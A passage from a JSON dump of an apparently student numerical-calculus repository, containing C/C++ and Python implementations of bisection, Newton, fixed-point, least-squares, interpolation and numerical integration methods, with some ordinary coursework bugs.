\"(300 + ((pow(0.25, 2) * 32.17)/0.1)*x*(1 - pow(M_E, (-0.1/0.25)*x)))/((0.25*32.17)/0.1)\",\n 10, f41, \"f(x) = x^4 + 2x^2 - x - 3\", \"(3 + x + 2x^2)^(1/4)\",\n 11, f42, \"f(x) = x^4 + 2x^2 - x - 3\", \"pow((x + 3 - pow(x, 4))/2, 1/2)\",\n 12, f43, \"f(x) = x^4 + 2x^2 - x - 3\", \"pow((x + 3)/(x*x + 2), 1/2)\",\n 13, f44, \"f(x) = x^4 + 2x^2 - x - 3\", \"(3*pow(x, 4) + 2*x + 3)/(4*pow(x, 3) + 4*x - 1)\",\n};\n" }, { "alpha_fraction": 0.5982028245925903, "alphanum_fraction": 0.6026957631111145, "avg_line_length": 21.257143020629883, "blob_id": "c56e33b53de30cf4744d13fc915a6b6922e26d0d", "content_id": "e91dc4c9aa981197f3899f58c3a380fc1ecfdf12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1563, "license_type": 
"no_license", "max_line_length": 97, "num_lines": 70, "path": "/raizes/bissecao/interface.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"bissecao.h\"\n\nusing namespace std;\n\nvoid imprimirFuncoes(){\n printf(\"Funções Implementadas:\\n\");\n for (auto &i: entradas) printf(\"%2d. %s\\n\", i.f, funcoes[i.f].desc);\n}\n\nint escolhaFuncao(){\n int ret;\n printf(\"\\nEscolha uma função: \");\n scanf(\"%d\", &ret);\n return ret;\n}\n\nvoid escolhaIntervalo(double *a, double *b, int f){\n double r, s;\n printf(\"\\nInforme o início do intervalo: \");\n scanf(\"%lf\", &r);\n\n printf(\"\\nInforme o final do intervalo: \");\n scanf(\"%lf\", &s);\n\n if (fabs(r - s) < EPSON){\n printf(\"O intervalo usado sera o da implementacao.\\n\");\n *a = entradas[f].a;\n *b = entradas[f].b;\n }\n else{\n *a = r;\n *b = s;\n }\n}\n\nint escolhaMetodo(){\n int ret;\n printf(\"\\nEscolha um Criterio de Parada:\\n\");\n for (auto &i: bissecoes) printf(\"%d. %s\\n\", i.i, i.desc);\n scanf(\"%d\", &ret);\n printf(\"\\n\");\n return ret;\n}\n\nvoid imprimirResultado(int f, double a, double b, int m){\n retorno ret = bissecoes[m].metodo(entradas[f].a, entradas[f].b, funcoes[entradas[f].f].funcao);\n\n printf(\"Funcao %d: \\n\", entradas[f].f);\n printf(\"Intervalo: [%.3lf, %.3lf]\\n\", entradas[f].a, entradas[f].b);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"x = %.8lf\\n\", ret.y);\n printf(\"f(x) = %.8lf\\n\", funcoes[entradas[f].f].funcao(ret.y));\n printf(\"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n int funcao, m;\n double a, b;\n\n imprimirFuncoes();\n funcao = escolhaFuncao();\n\n escolhaIntervalo(&a, &b, funcao);\n\n m = escolhaMetodo();\n\n imprimirResultado(funcao, a, b, m);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5388349294662476, "alphanum_fraction": 0.5849514603614807, "avg_line_length": 14.84615421295166, "blob_id": "87e2afab8b6ff0de1ceda25dcfdcf7effd402308", "content_id": "7c5db3cbd8ce1e0cb4d47616193c990a88f730d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 412, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/raizes/newton/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\ntypedef struct funcoes {\n double (*funcao)(double x);\n double (*derivada)(double x);\n}funcoes;\n\ndouble f1(double x){\n return 1/2 + (1/4)*x*x - x*sin(x) - (1/2)*cos(2*x);\n}\ndouble d1(double x){\n return x/2 - sin(x) + sin(2*x) + x*(-cos(x));\n}\n\ndouble f2(double x){\n return x*x - 6;\n}\ndouble d2(double x){\n return 2*x;\n}\n\nfuncoes funcao[] = {\n f1, d1,\n f2, d2,\n};\n" }, { "alpha_fraction": 0.6541353464126587, "alphanum_fraction": 0.6541353464126587, "avg_line_length": 15.625, "blob_id": "9e16d3e4a9e2068d30eebebfeb63c4c15e54fc92", "content_id": "0a9873cb086e0e50c2d4212c41fbaff802355db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 133, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/raizes/comum.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "typedef struct retorno{\n double y, erro;\n int iteracoes;\n}retorno;\n\ndouble erro(double a, double b){\n return fabs((a - b) / a);\n}\n" }, { "alpha_fraction": 0.4292604625225067, "alphanum_fraction": 0.440514475107193, "avg_line_length": 32.56756591796875, 
"blob_id": "153daeb5b9be1f996c192fca9282a5cb776b13a0", "content_id": "f81194d1520d0699fbf3a47bb2de311f63c54da9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 109, "num_lines": 37, "path": "/minimos-quadrados/bruno.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "print(\"------- Aproximação pelo Método de Mínimos Quadrados Linear -------\")\nn = eval(input(\"Digite o número de pontos: \"))\n\npontos = []\nsom_xi = 0\nsom_yi = 0\nsom_xiyi = 0\nsom_xi2 = 0\n\nfor i in range(n):\n x = eval(input(\"Preencha o valor de x: \"))\n y = eval(input(\"Preencha o valor de f({}): \".format(x)))\n pontos.append((x, y))\n som_xi += x\n som_yi += y\n som_xiyi += x*y\n som_xi2 += x**2\n\nb = ((som_xi2 * som_yi) - (som_xi * som_xiyi)) / ((n * som_xi2) - (som_xi ** 2))\na = ((n * som_xiyi) - (som_xi * som_yi)) / ((n * som_xi2) - (som_xi ** 2))\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"Pontos (x, y): {}\".format(pontos))\nprint(\"------------------------------\")\nprint(\"Som xi = {} | Som yi = {} | Som xi*yi = {} | Som xi^2 = {}\".format(som_xi, som_yi, som_xiyi, som_xi2))\nprint(\"------------------------------\")\nprint(\"Função g(x) = {}x + {}\".format(a, b))\nprint(\"------------------------------\")\nprint(\"------------------------------\")\n\nponto_a_avaliar = eval(input(\"Preencha o ponto a avaliar: \"))\naprx = (a*ponto_a_avaliar)+b\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"O valor aproximado de g(\",ponto_a_avaliar,\") é: \", aprx)\n\n\n" }, { "alpha_fraction": 0.4933469891548157, "alphanum_fraction": 0.5353121757507324, "avg_line_length": 15.862069129943848, "blob_id": "602ae296214e688404afd43102bc75d7c0776b85", "content_id": "18f36a0f990eb9b74177b6ab1abb23e835407570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 47, "num_lines": 58, "path": "/integracao/PythonApplication3/integracao.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "import time\n\ndef funcao(x):\n return x ** 3 + x ** 2 + 5\n\n\ndef metodoTrapezio(n):\n\tsomatorio = 0.0\n\toperacoes = 0.0\n\n\th = (b - a) / n\n\n\tfor i in range(n):\n\t\tx0 = a + (h * i)\n\t\tx1 = a + (h * (i + 1))\n\t\tsomatorio += funcao(x0) + funcao(x1)\n\t\n\tsomatorio = somatorio * (h / 2)\n\n\treturn somatorio\n\n\ndef metodoSimpson(n):\n somatorio = 0.0\n operacoes = 0.0\n\n if n % 2 == 1:\n n += 1\n\n h = (b - a) / n\n\n for i in range(n - 2):\n xi = a + (h * i)\n if i % 2:\n somatorio += 4 * funcao(xi)\n else:\n somatorio += 2 * funcao(xi)\n\n somatorio += funcao(a) + funcao(b)\n somatorio = somatorio * (h / 3)\n\n return somatorio\n\n\na = 0.0\nb = 1.0\nn = 300000\n# Resultado: 67/12\n\ninicio = time.time()\nprint('Trapezios', metodoTrapezio(n))\nfinal = time.time()\nprint(str(final - inicio)[:5], \"segundos.\\n\\n\")\n\ninicio = time.time()\nprint('Simpson', metodoSimpson(n))\nfinal = time.time()\nprint(str(final - inicio)[:5], \"segundos.\\n\\n\")" }, { "alpha_fraction": 0.2964285612106323, "alphanum_fraction": 0.43214285373687744, "avg_line_length": 11.17391300201416, "blob_id": "6cd5d2f0d831e9a2bec20b3737ad84cd9b6bc255", "content_id": "2503b68d247990f97d0bd987101c54dc282473c2", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "C", "length_bytes": 282, "license_type": "no_license", "max_line_length": 26, "num_lines": 23, "path": "/raizes/ponto-fixo/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define EPSON 0.00001\n\ntypedef struct{\n int f;\n double x0;\n}tipoEntrada;\n\ntipoEntrada entradas[] = {\n// Função - Chute Inicial\n // 0, 0,\n // 1, 0,\n // 2, 6,\n // 3, 6,\n // 4, 6,\n // 5, 2,\n // 7, 2,\n // 8, 2,\n // 9, 50,\n // 13, 7,\n // 12, 9,\n // 11, 2,\n // 10, 2,\n};\n" }, { "alpha_fraction": 0.3925233781337738, "alphanum_fraction": 0.5091426372528076, "avg_line_length": 30.151899337768555, "blob_id": "4d23ab0dd0c3d6ec2090912c2e8980e50f16e3b0", "content_id": "21b2aedd01f472d00e5260530cf080ed96beeb77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/raizes/bissecao/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct funcao{\n int i;\n double (*funcao)(double x);\n char desc[100];\n}funcao;\n\ndouble f0(double x){ // Lista 03, Exercício 01\n return sqrt(x) - cos(x);\n}\ndouble f1(double x){ // Lista 03, Exercício 02\n return 3*(x + 1.0)*(x - 1.0/2.0)*(x - 1.0);\n}\ndouble f2(double x){ // Lista 03, Exercício 03\n return pow(x, 4.0) - 2*pow(x, 3.0) - 4*pow(x, 2.0) + 4.0*x + 4.0;\n}\ndouble f3(double x){ // Lista 03, Exercício 04\n return pow(x, 3.0) - 7*pow(x, 2.0) + 14.0*x - 6.0;\n}\ndouble f4(double x){ // Lista 03, Exercício 05, a\n return x - pow(2.0, -x);\n}\ndouble f5(double x){ // Lista 03, Exercício 05, b\n return pow(M_E, x) - pow(x, 2.0) + 3.0*x - 2.0;\n}\ndouble f6(double x){ // Lista 03, Exercício 05, c\n return 2.0*x*cos(2*x) - pow((x + 1.0), 2.0);\n}\ndouble f7(double x){ // Lista 03, Exercício 05, d\n return x*cos(x) - 2.0*pow(x, 2.0) + 3.0*x - 1.0;\n}\ndouble f8(double x){ // Lista 03, Exercício 06, a\n return 3.0*x - pow(M_E, x);\n}\ndouble f9(double x){ // Lista 03, Exercício 06, b\n return x + 3.0*cos(x) - pow(M_E, x);\n}\ndouble f10(double x){ // Lista 03, Exercício 06, c\n return pow(x, 2.0) - 4.0*x + 4.0 - log(x);\n}\ndouble f11(double x){ // Lista 03, Exercício 06, d\n return x + 1.0 - 2.0*sin(M_PI*x);\n}\ndouble f12(double x){ // Lista 03, Exercício 07\n return 2*sin(x) - x;\n}\ndouble f13(double x){ // Lista 03, Exercício 10\n return (x + 2.0)*pow((x + 1.0), 3.0)*x*pow((x - 1.0), 2.0)*(x - 2.0);\n}\ndouble f14(double x){ // Lista 03, Exercício 12\n return pow(x, 2.0) - 3;\n}\ndouble f15(double h){ // Lista 03, Exercício 19 e Prova 01, Questão 01\n return 10.0*(0.5*M_PI - asin(h) - h*pow((1.0 - h*h), 1.0/2.0)) - 12.4;\n}\n\nfuncao funcoes[] = {\n 0, f0, \"f(x) = sqrt(x) - cos(x)\",\n 1, f1, \"f(x) = 3(x + 1)(x - 1/2)(x - 1)\",\n 2, f2, \"f(x) = x^4 - 2x^3 - 4x^2 + 4x + 4\",\n 3, f3, \"f(x) = x^3 - 7x^2 + 14x - 6\",\n 4, f4, \"f(x) = x - x^-2\",\n 5, f5, \"f(x) = e^x - x^2 + 3x - 2\",\n 6, f6, \"f(x) = 2xcos(2x) - (x + 1)^2\",\n 7, f7, \"f(x) = xcos(x) - 2x^2 - 3x - 1\",\n 8, f8, \"f(x) = 3x - e^x\",\n 9, f9, \"f(x) = x + 3cos(x) - e^x\",\n 10, f10, \"f(x) = x^2 - 4x + 4 - ln(x)\",\n 11, f11, \"f(x) = x + 1 - 2sen(PIx)\",\n 12, f12, \"p(x) = 2sen(x) - x\",\n 13, f13, \"f(x) = (x+2)(x+1)^3*x(x-1)^2(x-2)\",\n 14, f14, \"f(x) = x^2 - 3\",\n 15, f15, \"f(h) = L * ((0.5 * PI) - arcsin(h) - h * (1 - h^2)^(1/2)) - V\",\n};\n" }, { 
"alpha_fraction": 0.43800124526023865, "alphanum_fraction": 0.45280691981315613, "avg_line_length": 29, "blob_id": "6160d19d83eb4cd3e4d6729f71fe99bc4591c7f3", "content_id": "b7e3efc07c6fa7bd8e1cb9be87f65187c071fa44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1626, "license_type": "no_license", "max_line_length": 96, "num_lines": 54, "path": "/interpolacao-newton/bruno.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "print(\"------- Interpoção Polinomial (Método de Newton) -------\")\nn = eval(input(\"Digite o grau do polinômio a ser avaliado: \"))+1\n\nmatriz = [0.0] * n\nfor i in range(n):\n matriz[i] = [0.0] * n\n\nvetor = [0.0] * n\n\nprint(matriz)\nprint(vetor)\nfor i in range(n):\n x = eval(input(\"Preencha o valor de x: \"))\n y = eval(input(\"Preencha o valor de f({}): \".format(x)))\n vetor[i]=float(x)\n matriz[i][0]=float(y)\n\nprint(vetor) \nprint(matriz)\n\nponto_a_avaliar = eval(input(\"Preencha o ponto a avaliar: \"))\n\nprint(\"------------------------------\")\nprint(\"------- Calculando ... -------\")\nprint(\"------------------------------\")\n\nfor i in range(1,n):\n for j in range(i,n):\n print(\"i=\",i,\" j=\",j)\n print(\"(\",matriz[j][i-1],\"-\",matriz[j-1][i-1],\")/(\",vetor[j],\"-\",vetor[j-i],\")\")\n matriz[j][i] = ( (matriz[j][i-1]-matriz[j-1][i-1]) / (vetor[j]-vetor[j-i]))\n print(\"matriz[\",j,\"][\",i,\"] = \",(matriz[j][i-1]-matriz[j-1][i-1])/(vetor[j]-vetor[j-i]))\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nfor i in range(n):\n print(matriz[i])\nprint(\"------------------------------\")\nprint(\"------------------------------\")\n\naprx = 0\nmul = 1.0\nfor i in range(n):\n print(\"matriz[\",i,\"][\",i,\"]\",\"=\",matriz[i][i])\n mul = matriz[i][i];\n print(\"mul antes do ciclo j=\",mul)\n for j in range(1,i+1):\n mul = mul * (ponto_a_avaliar - vetor[j-1])\n print(\"mul no ciclo j=\",mul)\n aprx = aprx + mul\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"O valor aproximado de f(\",ponto_a_avaliar,\") é: \", aprx)\n\n" }, { "alpha_fraction": 0.5778894424438477, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 24.95652198791504, "blob_id": "25238584308a80f4cd2334984fe914560e085e9d", "content_id": "8f902de86141d5b33441aed7d1a0fa8956018e13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 597, "license_type": "no_license", "max_line_length": 56, "num_lines": 23, "path": "/raizes/bissecao/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"bissecao.h\"\n\nusing namespace std;\n\nvoid imprimir(tipoEntrada i, bissecao j){\n retorno ret = j.metodo(i.a, i.b, funcoes[i.f].funcao);\n\n printf(\"Funcao %d: (%s)\\n\", i.f, funcoes[i.f].desc);\n printf(\"Metodo: %s)\\n\", j.desc);\n printf(\"Intervalo: [%.3lf, %.3lf]\\n\", i.a, i.b);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"x = %.8lf\\n\", ret.y);\n printf(\"f(x) = %.8lf\\n\", funcoes[i.f].funcao(ret.y));\n printf(\"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n for (auto &i: entradas)\n for (auto &j: bissecoes)\n imprimir(i, j);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.27950310707092285, "alphanum_fraction": 0.3788819909095764, "avg_line_length": 14.682927131652832, "blob_id": "5bf3e0f7aef8933776b70302449da85a020e5277", "content_id": 
"cb1d2a683a9b9849b3c9a75f8d377a446740a35d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 39, "num_lines": 41, "path": "/minimos-quadrados/PythonApplication2/minimos-quadrados.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": " entrada = [(0, 0.01),\n (1, 1.01),\n (2, 1.40),\n (3, 3.81),\n (4, 4.01),\n (5, 4.55),\n (6, 4.20)]\n\naproximacoes = []\n\n#entrada = [(0.128, -20),\n# (0.134, 10),\n# (0.144, 70)]\n\nX = 7\n\nx = 0\nx2 = 0\nxy = 0\ny = 0\n\nn = len(entrada)\n\nfor i in range(n):\n x += entrada[i][0]\n x2 += entrada[i][0] ** 2\n xy += entrada[i][0] * entrada[i][1]\n y += entrada[i][1]\n\na = ((n * xy - x * y )/\n (n * x2 - x ** 2))\n\nb = ((x2 * y - x * xy)/\n (n * x2 - x ** 2))\n\n\nfor i in range(n):\n aproximacaoes[i] = (a * i) + b\n\nprint(aproximacao)\nprint(aproximacoes)\n" }, { "alpha_fraction": 0.5777027010917664, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 17.5, "blob_id": "f5ba9fb3917658a06452e7fe735d3daa1366423b", "content_id": "465035d06af53514bd00ef90cb4346ca86239bac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 296, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/raizes/ponto-fixo/ponto-fixo.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"funcoes.h\"\n#include \"../comum.h\"\n\nretorno executar(double x, int f){\n retorno ret;\n\n for (ret.iteracoes = 0; ret.iteracoes < 1000; ret.iteracoes++){\n ret.y = funcoes[f].funcao(x);\n\n ret.erro = erro(ret.y, x);\n if (ret.erro < EPSON) break;\n\n x = ret.y;\n }\n return ret;\n}\n" } ]
22
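The unrolled loops at the top of the preceding record repeat the same Newton update x ← x − f(x)/f′(x) five times per test function. As a cross-check, a minimal, self-contained Python sketch of that step follows (the helper name `newton` and the driver line are illustrative, not part of the record; only the f(x) = x² − 6 pair mirrors the record's f2/d2):

def newton(f, df, x, iterations=5):
    # Repeat x <- x - f(x)/df(x), exactly the step the C loops above unroll.
    for _ in range(iterations):
        x = x - f(x) / df(x)
    return x

# Root of f(x) = x^2 - 6 (the record's f2/d2 pair), starting from x0 = 1:
print(newton(lambda x: x * x - 6, lambda x: 2 * x, 1.0))  # ~2.449490, i.e. sqrt(6)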
acute0203/py-data-api
https://github.com/acute0203/py-data-api
8bd6e91908c195848b7f46a9336fccb4a8c36a3b
199769b9584d4e9dd48a98696f35e2435880a34f
881e2af88ae14cae1e040e05b130bb3587ee4317
refs/heads/master
2020-09-06T13:30:25.017576
2019-11-08T10:00:23
2019-11-08T10:00:23
220,437,676
1
0
MIT
2019-11-08T09:55:47
2019-11-05T14:05:12
2019-11-08T05:47:42
null
[ { "alpha_fraction": 0.5685092210769653, "alphanum_fraction": 0.5842546224594116, "avg_line_length": 28.554454803466797, "blob_id": "27356068369358f0e4bb83306b99369f10b976ea", "content_id": "1244fd4c3de8dd8af342cc0c3c10f654192fc2f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5970, "license_type": "permissive", "max_line_length": 91, "num_lines": 202, "path": "/tests/integration/test_mysql.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import time\nfrom typing import List\n\nimport boto3\nimport pytest\nfrom pydataapi import DataAPI, Result, transaction\nfrom pydataapi.pydataapi import Record\nfrom sqlalchemy import Column, Integer, String, create_engine\nfrom sqlalchemy.engine import Connection\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy.sql import Insert\n\npytest_plugins = [\"docker_compose\"]\n\n\nclass Pets(declarative_base()):\n __tablename__ = 'pets'\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(255, collation='utf8_unicode_ci'), default=None)\n\n\ndatabase: str = 'test'\nresource_arn: str = 'arn:aws:rds:us-east-1:123456789012:cluster:dummy'\nsecret_arn: str = 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy'\n\n\ndef get_connection() -> Connection:\n return create_engine(\n 'mysql+pymysql://root:[email protected]:3306/test?charset=utf8mb4'\n ).connect()\n\n\[email protected](scope='module')\ndef db_connection(module_scoped_container_getter) -> Connection:\n retries = 60\n while True:\n try:\n connection = get_connection()\n try:\n yield connection\n finally:\n if not connection.closed:\n connection.close()\n break\n except Exception as e:\n print(str(e))\n if retries > 0:\n retries -= 1\n time.sleep(1)\n continue\n raise\n\n\[email protected]()\ndef create_table(db_connection) -> None:\n db_connection.execute('drop table if exists pets;')\n db_connection.execute(\n 'create table pets (id int auto_increment not null primary key, name varchar(10));'\n )\n\n\[email protected]()\ndef rds_data_client(db_connection, create_table):\n return boto3.client(\n 'rds-data',\n endpoint_url='http://127.0.0.1:8080',\n aws_access_key_id='aaa',\n aws_secret_access_key='bbb',\n )\n\n\ndef test_simple_execute(rds_data_client):\n data_api = DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n database=database,\n client=rds_data_client,\n )\n result: Result = data_api.execute('show tables')\n assert len(result.one()) == 1\n assert result.one()[0] == 'pets'\n\n\ndef test_decorator(rds_data_client, db_connection):\n @transaction(\n database=database,\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n client=rds_data_client,\n )\n def add_pet(data_api: DataAPI, pet_names: List[str]) -> None:\n response = data_api.execute(Insert(Pets, {'name': pet_names[0]}))\n assert response.generated_fields_first == 1\n response = data_api.execute(Insert(Pets, {'name': pet_names[1]}))\n assert response.generated_fields_first == 2\n\n pet_names: List[str] = ['dog', 'cat']\n add_pet(pet_names)\n result = list(db_connection.execute('select * from pets'))\n assert result[0][1] == 'dog'\n assert result[1][1] == 'cat'\n\n\ndef test_with_statement(rds_data_client, db_connection):\n with DataAPI(\n database=database,\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n client=rds_data_client,\n ) as data_api:\n insert: Insert = Insert(Pets, {'name': 'dog'})\n\n result = data_api.execute(insert)\n 
assert result.number_of_records_updated == 1\n\n query = Query(Pets).filter(Pets.id == 1)\n result = data_api.execute(query)\n\n assert list(result) == [Record([1, 'dog'], [])]\n\n result = data_api.execute('select * from pets')\n assert result.one().dict() == {'id': 1, 'name': 'dog'}\n\n insert: Insert = Insert(Pets)\n data_api.batch_execute(\n insert,\n [\n {'id': 2, 'name': 'cat'},\n {'id': 3, 'name': 'snake'},\n {'id': 4, 'name': 'rabbit'},\n ],\n )\n\n result = data_api.execute('select * from pets')\n expected = [\n Record([1, 'dog'], ['id', 'name']),\n Record([2, 'cat'], ['id', 'name']),\n Record([3, 'snake'], ['id', 'name']),\n Record([4, 'rabbit'], ['id', 'name']),\n ]\n assert list(result) == expected\n\n for row, expected_row in zip(result, expected):\n assert row == expected_row\n\n\ndef test_rollback(rds_data_client, db_connection):\n try:\n with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n # you can rollback by Exception\n raise Exception\n except:\n pass\n result = list(db_connection.execute('select * from pets'))\n assert result == []\n\n\ndef test_rollback_with_custom_exception(db_connection):\n rds_data_client = boto3.client(\n 'rds-data',\n endpoint_url='http://127.0.0.1:8080',\n aws_access_key_id='aaa',\n aws_secret_access_key='bbb',\n )\n\n class OriginalError(Exception):\n pass\n\n class OtherError(Exception):\n pass\n\n try:\n with DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n rollback_exception=OriginalError,\n database=database,\n client=rds_data_client,\n ) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n raise OriginalError # rollback\n except:\n pass\n result = list(db_connection.execute('select * from pets'))\n assert result == []\n\n try:\n with DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n rollback_exception=OriginalError,\n database=database,\n client=rds_data_client,\n ) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n raise OtherError\n except:\n pass\n result = list(get_connection().execute('select * from pets'))\n assert result == [(2, 'dog')]\n" }, { "alpha_fraction": 0.6444725394248962, "alphanum_fraction": 0.6590226292610168, "avg_line_length": 29.995098114013672, "blob_id": "fac4bf048be7e816189d760edaf163d97ec2771e", "content_id": "2c9cfa4ce8c42c4473e7064467bc814d83585cf6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6323, "license_type": "permissive", "max_line_length": 130, "num_lines": 204, "path": "/README.md", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "# py-data-api - Data API Client for Python\n\n[![Build Status](https://travis-ci.org/koxudaxi/py-data-api.svg?branch=master)](https://travis-ci.org/koxudaxi/py-data-api)\n[![PyPI version](https://badge.fury.io/py/pydataapi.svg)](https://badge.fury.io/py/pydataapi)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pydataapi)](https://pypi.python.org/pypi/pydataapi)\n[![codecov](https://codecov.io/gh/koxudaxi/py-data-api/branch/master/graph/badge.svg)](https://codecov.io/gh/koxudaxi/py-data-api)\n![license](https://img.shields.io/github/license/koxudaxi/py-data-api.svg)\n\npy-data-api is a user-friendly client which supports SQLAlchemy models.\nAlso, the package includes DB API 2.0 Client and SQLAlchemy Dialects.\n\n## Features\n- A user-friendly client which supports SQLAlchemy models\n- SQLAlchemy Dialects (experimental)\n- DB API 2.0 
compatible client [PEP 249](https://www.python.org/dev/peps/pep-0249/)\n\n## What's AWS Aurora Serverless's Data API?\nhttps://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/data-api.html\n\n## This project is in an experimental phase.\nWarning: Some interfaces may still change.\n\n## How to install\npydataapi requires Python 3.6.1 or later \n```bash\n$ pip install pydataapi\n```\n\n## Example\n\n```python\nfrom typing import List\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy.sql import Insert\n\nfrom pydataapi import DataAPI, transaction, Result, Record\n\n\nclass Pets(declarative_base()):\n    __tablename__ = 'pets'\n    id = Column(Integer, primary_key=True, autoincrement=True)\n    name = Column(String(255, collation='utf8_unicode_ci'), default=None)\n\n\ndatabase: str = 'test'\nresource_arn: str = 'arn:aws:rds:us-east-1:123456789012:cluster:serverless-test-1'\nsecret_arn: str = 'arn:aws:secretsmanager:us-east-1:123456789012:secret:serverless-test1'\n\n\ndef example_with_statement():\n    # DataAPI supports with statement for handling transaction\n    with DataAPI(database=database, resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n\n        # start transaction\n\n        insert: Insert = Insert(Pets, {'name': 'dog'})\n        # INSERT INTO pets (name) VALUES ('dog')\n\n        # `execute` accepts SQL statement as str or SQL Alchemy SQL objects\n        result: Result = data_api.execute(insert)\n        print(result.number_of_records_updated)\n        # 1\n\n        query = Query(Pets).filter(Pets.id == 1)\n        result: Result = data_api.execute(query)  # or data_api.execute('select id, name from pets')\n        # SELECT pets.id, pets.name FROM pets WHERE pets.id = 1\n\n        # `Result` like a Result object in SQL Alchemy\n        print(result.scalar())\n        # 1\n\n        print(result.one())\n        # [Record<id=1, name='dog'>]\n        \n        # `Result` is Sequence[Record]\n        records: List[Record] = list(result)\n        print(records)\n        # [Record<id=1, name='dog'>]\n\n        # Record is Sequence and Iterator\n        record = records[0]\n        print(record[0])\n        # 1\n        print(record[1])\n        # dog\n\n        for column in record:\n            print(column)\n            # 1 ...\n\n        # show record as dict()\n        print(record.dict())\n        # {'id': 1, 'name': 'dog'}\n\n        # batch insert\n        insert: Insert = Insert(Pets)\n        data_api.batch_execute(insert, [\n            {'id': 2, 'name': 'cat'},\n            {'id': 3, 'name': 'snake'},\n            {'id': 4, 'name': 'rabbit'},\n        ])\n\n        result = data_api.execute('select * from pets')\n        print(list(result))\n        # [Record<id=1, name='dog'>, Record<id=2, name='cat'>, Record<id=3, name='snake'>, Record<id=4, name='rabbit'>]\n\n        # result is a sequence object\n        for record in result:\n            print(record)\n            # Record<id=1, name='dog'> ...\n\n        # commit\n\n\ndef example_decorator():\n    pet_names: List[str] = ['dog', 'cat', 'snake']\n    add_pets(pet_names)\n\n\n@transaction(database=database, resource_arn=resource_arn, secret_arn=secret_arn)\ndef add_pets(data_api: DataAPI, pet_names: List[str]) -> None:\n    # start transaction\n    for pet_name in pet_names:\n        data_api.execute(Insert(Pets, {'name': pet_name}))\n    # some logic ...\n\n    # commit\n\n\ndef example_simple_execute():\n    data_api = DataAPI(resource_arn=resource_arn, secret_arn=secret_arn, database=database)\n    result: Result = data_api.execute('show tables')\n    print(result.scalar())\n    # Pets\n\n\ndef example_rollback():\n    with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n        data_api.execute(Insert(Pets, 